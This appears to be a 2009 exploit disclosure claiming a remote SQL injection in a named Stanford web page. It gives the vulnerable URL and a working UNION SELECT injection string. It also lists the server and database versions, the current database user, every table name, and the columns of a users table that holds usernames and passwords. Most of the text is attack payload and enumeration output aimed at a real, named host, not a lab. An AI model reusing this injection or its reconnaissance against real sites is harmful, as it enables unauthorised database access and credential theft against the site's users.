-----------------------------------------------------------------------------------------------

[+] Stanford.edu suffers from a remote SQL injection vulnerability
[+] Found By: Rohit Bansal
[+] Date: 06-02-2009

---------------------------------------------------------------------------------------------


Host Information

 Server = Apache/2.2.3 (Debian) mod_fastcgi/2.4.2 PHP/5.2.0-8+etch13
mod_ssl/2.2.3 OpenSSL/0.9.8c WebAuth/3.6.0
    Version = 5.0.51a-19~bpo40+1-log
    Powered by = PHP/5.2.0-8+etch13
    Current User = genvironmentwoo@www5.Stanford.EDU
    Current Database = g_environment_woodsfacultydb
    Supports Union = yes
    Union Columns = 12


Url|  http://woods.stanford.edu/cgi-bin/video.php?videoid=23

Vuln: http://woods.stanford.edu/cgi-bin/video.php?videoid=23 +and+1=0+ Union
Select  1 ,2,3, UNHEX(HEX([visible])) ,5,6,7,8,9,10,11,12

Comment: --

Visible Column: 4

Hexed: True

Database:g_environment_woodsfacultydb
    information_schema
    g_environment_woodsfacultydb

Tables:users
    StudentGroups
    adcouncil
    agendas
    announcements
    biofuels
    carbon
    cccp
    ecosystem
    events
    evp
    evpIDseed
    evpRFP
    evploi
    evppeople
    evpreport
    facultydb
    globalwater
    groundwater
    homepage
    images
    locations
    loiReviewers
    loireview
    mailinglist
    news
    newssource
    pacsalmon
    rfpreview
    seeds
    staff
    staffCenters
    users
    video
    waterwest
    woodsnews

Columns: Table users
    username
    password
    fullname
    fname
    lname
    auth_state
    timestamp
    cryptword

---------------------------------------------------------------------------------------
[+]^Rohit Bansal [rohitisback@gmail.com]
[+] SecurenSafe, Schap.org, Infysec, Evilfinger,
---------------------------------------------------------------------------------------